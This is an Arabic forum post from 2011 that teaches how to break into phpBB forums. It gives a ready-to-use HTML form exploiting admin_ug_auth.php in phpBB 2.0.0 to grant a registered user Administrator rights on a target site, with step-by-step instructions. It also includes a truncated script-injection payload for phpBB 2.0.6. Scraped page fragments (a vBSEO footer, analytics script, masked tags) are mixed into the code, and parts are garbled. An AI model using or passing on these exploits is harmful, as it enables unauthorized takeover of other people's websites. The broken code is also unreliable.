(((بســـــم الله الرحمـــــــــن الرحيــــــــــــــم )
اليوم اقدم لــــكم بعض طرق اختراق منتديات phpbb
ثغرة خطيرة من منتدى من نوع
PhpBB2
في ملف admin_ug_auth.php
الوصف:
يمكنك من خلال هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى
وبذلك يمكنك الدخول الى لوحة التحكم متى شئت
الأصدار:
2.0.0
لتجربة الثغرة اولا سجل بالمنتدى
ثم احفظ رقم عضويتك بالمنتدى
بعدها افتح المفكرة وانسخ مايلي اليها
كود PHP:
<html>
<head>
</head>
******>
<form method="post"
action="http://www.domain_name/board_directory/adm in/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">
</form>
<br /><div style="z-index:3" class="smallfont" align="center">Search Engine Friendly URLs by vBSEO 3.1.0 ©2007, Crawlability, Inc.</div>
******** src="http://www.google-analytics.com/urchin.js" type="text/**********">
***********
******** type="text/**********">
_uacct = "UA-3303329-1";
urchinTracker();
***********
</body>
</html>
عدل هذا العنوان الى عنوان الموقع المستهدف
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]اخفظه بامتدادhtml
عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد
قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator
ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى
أضغط زر submit
بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك
::::::::
ثغره فى الاصدار Powered by phpBB 2.0.6
كل ما عليك تطبق الكود
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط][color=#000000]
][cat_id]=1&category_rows[0][cat_title]=waraxe********>document.write(document
موضوع: بـــعض طـــرق اختـــــراق منتــــديات phpbb 
الإثنين سبتمبر 12, 2011 1:03 am